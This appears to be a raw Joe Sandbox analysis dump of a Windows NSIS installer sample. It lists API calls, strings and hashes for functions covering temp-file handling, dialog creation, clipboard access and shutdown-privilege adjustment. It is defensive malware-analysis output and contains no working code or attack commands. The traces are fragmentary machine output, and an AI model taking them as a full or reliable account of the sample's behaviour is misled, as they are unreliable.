SetFilePointer 3460->3563 3461 403331 ReadFile 3461->3475 3562 403347 SetFilePointer 3462->3562 3464 4030bc 3466 402e79 6 API calls 3464->3466 3466->3476 3467 403072 3469 403331 ReadFile 3467->3469 3468 4030a4 3470 403116 31 API calls 3468->3470 3471 40307d 3469->3471 3473 4030b0 3470->3473 3471->3462 3471->3476 3472 402e79 6 API calls 3472->3475 3473->3473 3474 4030ed SetFilePointer 3473->3474 3473->3476 3474->3476 3475->3458 3475->3461 3475->3464 3475->3472 3475->3476 3476->3376 3478 406694 5 API calls 3477->3478 3479 4039be 3478->3479 3480 4039c4 3479->3480 3481 4039d6 3479->3481 3576 
406201 wsprintfW 3480->3576 3482 406188 3 API calls 3481->3482 3483 403a06 3482->3483 3485 403a25 lstrcatW 3483->3485 3487 406188 3 API calls 3483->3487 3486 4039d4 3485->3486 3568 403c80 3486->3568 3487->3485 3490 405c97 18 API calls 3491 403a57 3490->3491 3492 403aeb 3491->3492 3494 406188 3 API calls 3491->3494 3493 405c97 18 API calls 3492->3493 3495 403af1 3493->3495 3496 403a89 3494->3496 3497 403b01 LoadImageW 3495->3497 3498 4062dc 17 API calls 3495->3498 3496->3492 3501 403aaa lstrlenW 3496->3501 3504 405bbc CharNextW 3496->3504 3499 403ba7 3497->3499 3500 403b28 RegisterClassW 3497->3500 3498->3497 3503 40140b 2 API calls 3499->3503 3502 403b5e SystemParametersInfoW CreateWindowExW 3500->3502 3532 403bb1 3500->3532 3505 403ab8 lstrcmpiW 3501->3505 3506 403ade 3501->3506 3502->3499 3507 403bad 3503->3507 3508 403aa7 3504->3508 3505->3506 3509 403ac8 GetFileAttributesW 3505->3509 3510 405b8f 3 API calls 3506->3510 3512 403c80 18 API calls 3507->3512 3507->3532 3508->3501 3511 403ad4 3509->3511 3513 403ae4 3510->3513 3511->3506 3515 405bdb 2 API calls 3511->3515 3516 403bbe 3512->3516 3577 4062ba lstrcpynW 3513->3577 3515->3506 3517 403bca ShowWindow 3516->3517 3518 403c4d 3516->3518 3519 406624 3 API calls 3517->3519 3520 4053f5 5 API calls 3518->3520 3521 403be2 3519->3521 3522 403c53 3520->3522 3523 403bf0 GetClassInfoW 3521->3523 3526 406624 3 API calls 3521->3526 3524 403c57 3522->3524 3525 403c6f 3522->3525 3528 403c04 GetClassInfoW RegisterClassW 3523->3528 3529 403c1a DialogBoxParamW 3523->3529 3530 40140b 2 API calls 3524->3530 3524->3532 3527 40140b 2 API calls 3525->3527 3526->3523 3527->3532 3528->3529 3531 40140b 2 API calls 3529->3531 3530->3532 3531->3532 3532->3394 3533->3382 3534->3415 3535->3420 3536->3422 3537->3434 3539 4058e2 3538->3539 3540 4058d6 CloseHandle 3538->3540 3539->3434 3540->3539 3542 401389 2 API calls 3541->3542 3543 401420 3542->3543 3543->3395 3545 405dec GetTickCount GetTempFileNameW 3544->3545 3546 405e22 3545->3546 

Control-flow Graph (graph not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetErrorMode.KERNELBASE ref: 004033B2
                                                                                                                                                                                              • GetVersion.KERNEL32 ref: 004033B8
                                                                                                                                                                                              • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033EB
                                                                                                                                                                                              • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 00403428
                                                                                                                                                                                              • OleInitialize.OLE32(00000000), ref: 0040342F
                                                                                                                                                                                              • SHGetFileInfoW.SHELL32(00440208,00000000,?,000002B4,00000000), ref: 0040344B
                                                                                                                                                                                              • GetCommandLineW.KERNEL32(00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 00403460
                                                                                                                                                                                              • CharNextW.USER32(00000000,004CB000,00000020,004CB000,00000000,?,00000006,00000008,0000000A), ref: 00403498
                                                                                                                                                                                                • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                              • GetTempPathW.KERNEL32(00002000,004DF000,?,00000006,00000008,0000000A), ref: 004035D2
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(004DF000,00001FFB,?,00000006,00000008,0000000A), ref: 004035E3
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF000,\Temp,?,00000006,00000008,0000000A), ref: 004035EF
                                                                                                                                                                                              • GetTempPathW.KERNEL32(00001FFC,004DF000,004DF000,\Temp,?,00000006,00000008,0000000A), ref: 00403603
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF000,Low,?,00000006,00000008,0000000A), ref: 0040360B
                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TEMP,004DF000,004DF000,Low,?,00000006,00000008,0000000A), ref: 0040361C
                                                                                                                                                                                              • SetEnvironmentVariableW.KERNEL32(TMP,004DF000,?,00000006,00000008,0000000A), ref: 00403624
                                                                                                                                                                                              • DeleteFileW.KERNELBASE(004DB000,?,00000006,00000008,0000000A), ref: 00403638
                                                                                                                                                                                                • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00002000,00403460,00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                              • ExitProcess.KERNEL32(00000006,?,00000006,00000008,0000000A), ref: 004036FE
                                                                                                                                                                                              • CoUninitialize.COMBASE(00000006,?,00000006,00000008,0000000A), ref: 00403703
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 00403724
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403737
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF000,0040A26C,004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403746
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DF000,.tmp,004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 00403751
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(004DF000,004D7000,004DF000,.tmp,004DF000,~nsu,004CB000,00000000,00000006,?,00000006,00000008,0000000A), ref: 0040375D
                                                                                                                                                                                              • SetCurrentDirectoryW.KERNEL32(004DF000,004DF000,?,00000006,00000008,0000000A), ref: 00403779
                                                                                                                                                                                              • DeleteFileW.KERNEL32(0043C208,0043C208,?,0047B000,00000008,?,00000006,00000008,0000000A), ref: 004037D3
                                                                                                                                                                                              • CopyFileW.KERNEL32(004E7000,0043C208,00000001,?,00000006,00000008,0000000A), ref: 004037E7
                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000,0043C208,0043C208,?,0043C208,00000000,?,00000006,00000008,0000000A), ref: 00403814
                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403843
                                                                                                                                                                                              • OpenProcessToken.ADVAPI32(00000000), ref: 0040384A
                                                                                                                                                                                              • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 0040385F
                                                                                                                                                                                              • AdjustTokenPrivileges.ADVAPI32 ref: 00403882
                                                                                                                                                                                              • ExitWindowsEx.USER32(00000002,80040002), ref: 004038A7
                                                                                                                                                                                              • ExitProcess.KERNEL32 ref: 004038CA
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Processlstrcat$ExitFile$CurrentDeleteDirectoryEnvironmentHandlePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeModuleNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                                                                                                              • String ID: .tmp$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$~nsu
                                                                                                                                                                                              • API String ID: 424501083-3195845224
                                                                                                                                                                                              • Opcode ID: d8143391da9922f0f8fdd9eae6183e51d391a53b8ae8d145ad5f2599bc791527
                                                                                                                                                                                              • Instruction ID: 33fbdd78d52bfd04f2c73b4da217482bb076a8c6d1615cdfa2cd3638f3c4bec2
                                                                                                                                                                                              • Opcode Fuzzy Hash: d8143391da9922f0f8fdd9eae6183e51d391a53b8ae8d145ad5f2599bc791527
                                                                                                                                                                                              • Instruction Fuzzy Hash: 45D1F471100310AAE720BF769D45B2B3AADEB4070AF10447FF885B62E1DBBD8D55876E

Control-flow Graph (graph not reproduced; legend: Executed / Not Executed)
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000403), ref: 004054BF
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EE), ref: 004054CE
                                                                                                                                                                                              • GetClientRect.USER32(?,?), ref: 0040550B
                                                                                                                                                                                              • GetSystemMetrics.USER32(00000002), ref: 00405512
                                                                                                                                                                                              • SendMessageW.USER32(?,00001061,00000000,?), ref: 00405533
                                                                                                                                                                                              • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 00405544
                                                                                                                                                                                              • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 00405557
                                                                                                                                                                                              • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405565
                                                                                                                                                                                              • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405578
                                                                                                                                                                                              • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040559A
                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 004055AE
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 004055CF
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 004055DF
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 004055F8
                                                                                                                                                                                              • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 00405604
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003F8), ref: 004054DD
                                                                                                                                                                                                • Part of subcall function 00404266: SendMessageW.USER32(00000028,?,00000001,00404091), ref: 00404274
                                                                                                                                                                                              • GetDlgItem.USER32(?,000003EC), ref: 00405621
                                                                                                                                                                                              • CreateThread.KERNELBASE(00000000,00000000,Function_000053F5,00000000), ref: 0040562F
                                                                                                                                                                                              • CloseHandle.KERNELBASE(00000000), ref: 00405636
                                                                                                                                                                                              • ShowWindow.USER32(00000000), ref: 0040565A
                                                                                                                                                                                              • ShowWindow.USER32(?,00000008), ref: 0040565F
                                                                                                                                                                                              • ShowWindow.USER32(00000008), ref: 004056A9
                                                                                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004056DD
                                                                                                                                                                                              • CreatePopupMenu.USER32 ref: 004056EE
                                                                                                                                                                                              • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 00405702
                                                                                                                                                                                              • GetWindowRect.USER32(?,?), ref: 00405722
                                                                                                                                                                                              • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 0040573B
                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405773
                                                                                                                                                                                              • OpenClipboard.USER32(00000000), ref: 00405783
                                                                                                                                                                                              • EmptyClipboard.USER32 ref: 00405789
                                                                                                                                                                                              • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405795
                                                                                                                                                                                              • GlobalLock.KERNEL32(00000000), ref: 0040579F
                                                                                                                                                                                              • SendMessageW.USER32(?,00001073,00000000,?), ref: 004057B3
                                                                                                                                                                                              • GlobalUnlock.KERNEL32(00000000), ref: 004057D3
                                                                                                                                                                                              • SetClipboardData.USER32(0000000D,00000000), ref: 004057DE
                                                                                                                                                                                              • CloseClipboard.USER32 ref: 004057E4
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
                                                                                                                                                                                              • String ID: {
                                                                                                                                                                                              • API String ID: 590372296-366298937

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • DeleteFileW.KERNELBASE(?,?,004DF000,74DF3420,00000000), ref: 004059F5
                                                                                                                                                                                              • lstrcatW.KERNEL32(00460250,\*.*,00460250,?,?,004DF000,74DF3420,00000000), ref: 00405A3D
                                                                                                                                                                                              • lstrcatW.KERNEL32(?,0040A014,?,00460250,?,?,004DF000,74DF3420,00000000), ref: 00405A60
                                                                                                                                                                                              • lstrlenW.KERNEL32(?,?,0040A014,?,00460250,?,?,004DF000,74DF3420,00000000), ref: 00405A66
                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(00460250,?,?,?,0040A014,?,00460250,?,?,004DF000,74DF3420,00000000), ref: 00405A76
                                                                                                                                                                                              • FindNextFileW.KERNELBASE(00000000,00000010,000000F2,?,?,?,?,0000002E), ref: 00405B16
                                                                                                                                                                                              • FindClose.KERNEL32(00000000), ref: 00405B25
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                                                                                                                                                                                              • String ID: \*.*
                                                                                                                                                                                              • API String ID: 2035342205-1173974218
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • FindFirstFileW.KERNELBASE(004DF000,00468298,00464250,00405CE0,00464250,00464250,00000000,00464250,00464250,004DF000,?,74DF3420,004059EC,?,004DF000,74DF3420), ref: 00406608
                                                                                                                                                                                              • FindClose.KERNELBASE(00000000), ref: 00406614
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Find$CloseFileFirst
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 2295610775-0
                                                                                                                                                                                              • Opcode ID: f7cd178be2e6469beafc72b660366141f3ce998a63a06fca00c04ee689428cf9
                                                                                                                                                                                              • Instruction ID: 086872f0bf6ffc0fec3bf9e050170664210a11ef237051a194e92f35cf11c1a2
                                                                                                                                                                                              • Opcode Fuzzy Hash: f7cd178be2e6469beafc72b660366141f3ce998a63a06fca00c04ee689428cf9
                                                                                                                                                                                              • Instruction Fuzzy Hash: 52D012315455205BC7001B386E0C85B7B599F553317158F37F46AF51E0DB758C62869D

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403D94
                                                                                                                                                                                              • ShowWindow.USER32(?), ref: 00403DB1
                                                                                                                                                                                              • DestroyWindow.USER32 ref: 00403DC5
                                                                                                                                                                                              • SetWindowLongW.USER32(?,00000000,00000000), ref: 00403DE1
                                                                                                                                                                                              • GetDlgItem.USER32(?,?), ref: 00403E02
                                                                                                                                                                                              • SendMessageW.USER32(00000000,000000F3,00000000,00000000), ref: 00403E16
                                                                                                                                                                                              • IsWindowEnabled.USER32(00000000), ref: 00403E1D
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000001), ref: 00403ECB
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000002), ref: 00403ED5
                                                                                                                                                                                              • SetClassLongW.USER32(?,000000F2,?), ref: 00403EEF
                                                                                                                                                                                              • SendMessageW.USER32(0000040F,00000000,00000001,?), ref: 00403F40
                                                                                                                                                                                              • GetDlgItem.USER32(?,00000003), ref: 00403FE6
                                                                                                                                                                                              • ShowWindow.USER32(00000000,?), ref: 00404007
                                                                                                                                                                                              • KiUserCallbackDispatcher.NTDLL(?,?), ref: 00404019
                                                                                                                                                                                              • EnableWindow.USER32(?,?), ref: 00404034
                                                                                                                                                                                              • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 0040404A
                                                                                                                                                                                              • EnableMenuItem.USER32(00000000), ref: 00404051
                                                                                                                                                                                              • SendMessageW.USER32(?,000000F4,00000000,00000001), ref: 00404069
                                                                                                                                                                                              • SendMessageW.USER32(?,00000401,00000002,00000000), ref: 0040407C
                                                                                                                                                                                              • lstrlenW.KERNEL32(00450248,?,00450248,00000000), ref: 004040A6
                                                                                                                                                                                              • SetWindowTextW.USER32(?,00450248), ref: 004040BA
                                                                                                                                                                                              • ShowWindow.USER32(?,0000000A), ref: 004041EE
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Window$Item$MessageSend$Show$EnableLongMenu$CallbackClassDestroyDispatcherEnabledSystemTextUserlstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 3282139019-0
                                                                                                                                                                                              • Opcode ID: fc0f4d7be1e4c82c86fade982caad82dc734dafc7249948e3003efd3e17736fb
                                                                                                                                                                                              • Instruction ID: ebd8885eb79f40fe398f9982bcc50e4b60f6275a3dc5f5776bcae5bce4ead0d0
                                                                                                                                                                                              • Opcode Fuzzy Hash: fc0f4d7be1e4c82c86fade982caad82dc734dafc7249948e3003efd3e17736fb
                                                                                                                                                                                              • Instruction Fuzzy Hash: AFC1D5B1500304ABDB206F61EE88E2B3A78FB95346F00053EF645B51F1CB799891DB6E

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              APIs
                                                                                                                                                                                                • Part of subcall function 00406694: GetModuleHandleA.KERNEL32(?,00000020,?,00403401,0000000A), ref: 004066A6
                                                                                                                                                                                                • Part of subcall function 00406694: GetProcAddress.KERNEL32(00000000,?), ref: 004066C1
                                                                                                                                                                                              • lstrcatW.KERNEL32(004DB000,00450248,80000001,Control Panel\Desktop\ResourceLocale,00000000,00450248,00000000,00000002,004DF000,74DF3420,004CB000,00000000), ref: 00403A2B
                                                                                                                                                                                              • lstrlenW.KERNEL32(Remove folder: ,?,?,?,Remove folder: ,00000000,004CF000,004DB000,00450248,80000001,Control Panel\Desktop\ResourceLocale,00000000,00450248,00000000,00000002,004DF000), ref: 00403AAB
                                                                                                                                                                                              • lstrcmpiW.KERNEL32(?,.exe,Remove folder: ,?,?,?,Remove folder: ,00000000,004CF000,004DB000,00450248,80000001,Control Panel\Desktop\ResourceLocale,00000000,00450248,00000000), ref: 00403ABE
                                                                                                                                                                                              • GetFileAttributesW.KERNEL32(Remove folder: ), ref: 00403AC9
                                                                                                                                                                                              • LoadImageW.USER32(00000067,00000001,00000000,00000000,00008040,004CF000), ref: 00403B12
                                                                                                                                                                                                • Part of subcall function 00406201: wsprintfW.USER32 ref: 0040620E
                                                                                                                                                                                              • RegisterClassW.USER32(00472E80), ref: 00403B4F
                                                                                                                                                                                              • SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 00403B67
                                                                                                                                                                                              • CreateWindowExW.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403B9C
                                                                                                                                                                                              • ShowWindow.USER32(00000005,00000000), ref: 00403BD2
                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit20W,00472E80), ref: 00403BFE
                                                                                                                                                                                              • GetClassInfoW.USER32(00000000,RichEdit,00472E80), ref: 00403C0B
                                                                                                                                                                                              • RegisterClassW.USER32(00472E80), ref: 00403C14
                                                                                                                                                                                              • DialogBoxParamW.USER32(?,00000000,00403D58,00000000), ref: 00403C33
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                                                                                                                                                              • String ID: .DEFAULT\Control Panel\International$.exe$Control Panel\Desktop\ResourceLocale$Remove folder: $RichEd20$RichEd32$RichEdit$RichEdit20W$_Nb
                                                                                                                                                                                              • API String ID: 1975747703-564491471
                                                                                                                                                                                              • Opcode ID: f1b2be5f89fac0cbf9958f47fdf3d8daba4c0bfed37b59ff3d0d792caf125e20
                                                                                                                                                                                              • Instruction ID: e946f9b6b947081a315c1f95bc525aa973ad4f651662e5f5477bf26fdb3bf1de
                                                                                                                                                                                              • Opcode Fuzzy Hash: f1b2be5f89fac0cbf9958f47fdf3d8daba4c0bfed37b59ff3d0d792caf125e20
                                                                                                                                                                                              • Instruction Fuzzy Hash: B361C8302407007ED720AF669E45E2B3A6CEB8474AF40417FF985B51E2DBBD5951CB2E

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemDirectoryW.KERNEL32(Remove folder: ,00002000), ref: 0040641D
                                                                                                                                                                                              • GetWindowsDirectoryW.KERNEL32(Remove folder: ,00002000,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,?,00405359,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000), ref: 00406430
                                                                                                                                                                                              • SHGetSpecialFolderLocation.SHELL32(00405359,0042F8B9,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,?,00405359,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000), ref: 0040646C
                                                                                                                                                                                              • SHGetPathFromIDListW.SHELL32(0042F8B9,Remove folder: ), ref: 0040647A
                                                                                                                                                                                              • CoTaskMemFree.OLE32(0042F8B9), ref: 00406485
                                                                                                                                                                                              • lstrcatW.KERNEL32(Remove folder: ,\Microsoft\Internet Explorer\Quick Launch), ref: 004064AB
                                                                                                                                                                                              • lstrlenW.KERNEL32(Remove folder: ,00000000,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,?,00405359,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000), ref: 00406503
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                                                                                                                                                              • String ID: Remove folder: $Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                                                                                                                                                              • API String ID: 717251189-3325303262
                                                                                                                                                                                              • Opcode ID: 412c271bb9d070f278564469311d6f605cf1b48e62db3e13451b1dc2679c3c4f
                                                                                                                                                                                              • Instruction ID: deb4280fb9253f119c0dee44fead77f8699473dbe43bed35a1e393a154a8df3c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 412c271bb9d070f278564469311d6f605cf1b48e62db3e13451b1dc2679c3c4f
                                                                                                                                                                                              • Instruction Fuzzy Hash: 87612371A00115AADF209F64DC44BAE37A5EF45318F22803FE907B62D0D77D9AA1C75E

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetTickCount.KERNEL32 ref: 00402EEE
                                                                                                                                                                                              • GetModuleFileNameW.KERNEL32(00000000,004E7000,00002000,?,00000006,00000008,0000000A), ref: 00402F0A
                                                                                                                                                                                                • Part of subcall function 00405DB0: GetFileAttributesW.KERNELBASE(004E7000,00402F1D,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405DB4
                                                                                                                                                                                                • Part of subcall function 00405DB0: CreateFileW.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,00000006,00000008,0000000A), ref: 00405DD6
                                                                                                                                                                                              • GetFileSize.KERNEL32(00000000,00000000,004EB000,00000000,004D7000,004D7000,004E7000,004E7000,80000000,00000003,?,00000006,00000008,0000000A), ref: 00402F56
                                                                                                                                                                                              Strings
                                                                                                                                                                                              • Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author , xrefs: 004030B5
                                                                                                                                                                                              • soft, xrefs: 00402FCB
                                                                                                                                                                                              • Error launching installer, xrefs: 00402F2D
                                                                                                                                                                                              • Null, xrefs: 00402FD4
                                                                                                                                                                                              • Inst, xrefs: 00402FC2
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: File$AttributesCountCreateModuleNameSizeTick
                                                                                                                                                                                              • String ID: Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author $Null$soft
                                                                                                                                                                                              • API String ID: 4283519449-527102705
                                                                                                                                                                                              • Opcode ID: b6f6648de98c24fa7c04dbba87c1fded15afc009f9c9acd1abae5bab2567aa71
                                                                                                                                                                                              • Instruction ID: d807cc789e5c0b6659aec278a7977cb1897ccc82e3fedab9e592eb30a9b28e48
                                                                                                                                                                                              • Opcode Fuzzy Hash: b6f6648de98c24fa7c04dbba87c1fded15afc009f9c9acd1abae5bab2567aa71
                                                                                                                                                                                              • Instruction Fuzzy Hash: 23511671901205ABDB20AF61DD85B9F7FACEB0431AF20403BF914B62D5C7789E818B9D

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • lstrcatW.KERNEL32(00000000,00000000,ExecShellAsUser,004D3000,?,?,00000031), ref: 004017B0
                                                                                                                                                                                              • CompareFileTime.KERNEL32(-00000014,?,ExecShellAsUser,ExecShellAsUser,00000000,00000000,ExecShellAsUser,004D3000,?,?,00000031), ref: 004017D5
                                                                                                                                                                                                • Part of subcall function 004062BA: lstrcpynW.KERNEL32(?,?,00002000,00403460,00472EE0,NSIS Error,?,00000006,00000008,0000000A), ref: 004062C7
                                                                                                                                                                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000,?), ref: 0040535A
                                                                                                                                                                                                • Part of subcall function 00405322: lstrlenW.KERNEL32(0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0,?,?,?,?,?,?,?,?,?,0040327A,00000000), ref: 0040536A
                                                                                                                                                                                                • Part of subcall function 00405322: lstrcatW.KERNEL32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,0040327A,0040327A,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,00000000,0042F8B9,74DF23A0), ref: 0040537D
                                                                                                                                                                                                • Part of subcall function 00405322: SetWindowTextW.USER32(Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\,Remove folder: C:\Users\user\AppData\Local\Temp\nsiC3F3.tmp\), ref: 0040538F
                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 004053B5
                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 004053CF
                                                                                                                                                                                                • Part of subcall function 00405322: SendMessageW.USER32(?,00001013,?,00000000), ref: 004053DD
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000000.00000002.2197864913.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_0_2_400000_YoS6ZBCcUy.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
